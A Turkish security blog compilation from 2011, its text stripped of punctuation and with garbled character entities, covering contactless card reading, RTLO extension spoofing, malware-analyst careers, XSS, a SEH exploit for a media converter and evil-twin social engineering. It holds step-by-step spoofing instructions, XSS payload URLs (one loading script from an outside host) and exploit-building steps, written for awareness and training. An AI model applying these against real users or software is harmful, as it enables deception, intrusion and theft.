Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

